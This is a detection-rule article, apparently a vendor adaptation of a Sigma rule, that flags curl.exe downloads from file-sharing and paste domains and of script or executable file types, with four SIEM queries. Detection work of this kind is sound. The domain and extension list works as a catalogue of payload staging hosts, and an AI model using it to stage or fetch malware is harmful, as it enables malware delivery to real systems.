Suspicious File Download From File Sharing Domain Via Curl.EXE

    Date: 10/26/2024

    Severity: High

    Summary

    Identifies potentially suspicious file downloads from file-sharing sites using curl.exe.

    Indicators of Compromise (IOC) List

    Image : 

    '\curl.exe'

    OriginalFileName :

    'curl.exe'

    CommandLine :

    - '.githubusercontent.com'      

    - 'anonfiles.com'

    - 'cdn.discordapp.com'

    - 'ddns.net'

    - 'dl.dropboxusercontent.com'

    - 'ghostbin.co'

    - 'glitch.me'

    - 'gofile.io'

    - 'hastebin.com'

    - 'mediafire.com'

    - 'mega.nz'

    - 'onrender.com'

    - 'pages.dev'

    - 'paste.ee'

    - 'pastebin.com'

    - 'pastebin.pl'

    - 'pastetext.net'

    - 'pixeldrain.com'

    - 'privatlab.com'

    - 'privatlab.net'

    - 'send.exploit.in'

    - 'sendspace.com'

    - 'storage.googleapis.com'

    - 'storjshare.io'

    - 'supabase.co'

    - 'temp.sh'

    - 'transfer.sh'

    - 'trycloudflare.com'

    - 'ufile.io'

    - 'w3spaces.com'

    - 'workers.dev'

    - 'Http'

    - ' -O' 

    - '--remote-name'

    - '--output'

    - ".ps1"

    - ".ps1'"

    - '.ps1"'

    - ".dat"

    - ".dat'"

    - '.dat"'

    - ".msi"

    - ".msi'"

    - '.msi"'

    - ".bat"

    - ".bat'"

    - '.bat"'

    - ".exe"

    - ".exe'"

    - '.exe"'

    - ".vbs"

    - ".vbs'"

    - '.vbs"'

    - ".vbe"

    - ".vbe'"

    - '.vbe"'

    - ".hta"

    - ".hta'"

    - '.hta"'

    - ".dll"

    - ".dll'"

    - '.dll"'

    - ".psm1"

    - ".psm1'"

    - '.psm1"'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    (resourcename = "Sysmon"  AND eventtype = "1"  ) AND image = "\curl.exe" AND originalfilename = "curl.exe" AND commandline In (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")

    Detection Query 2:

    (technologygroup = "EDR" ) AND image = "\curl.exe" AND originalfilename = "curl.exe" AND commandline In (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")

    Detection Query 3:

    ((resourcename = "Windows Security"  AND eventtype = "4688"  ) AND newprocessname = "\curl.exe"  ) AND message IN (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")

    Detection Query 4:

    (technologygroup = "EDR") AND newprocessname = "\curl.exe" AND message IN (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")

    Reference:

    https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml 


    Tags

    MalwareSigma

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags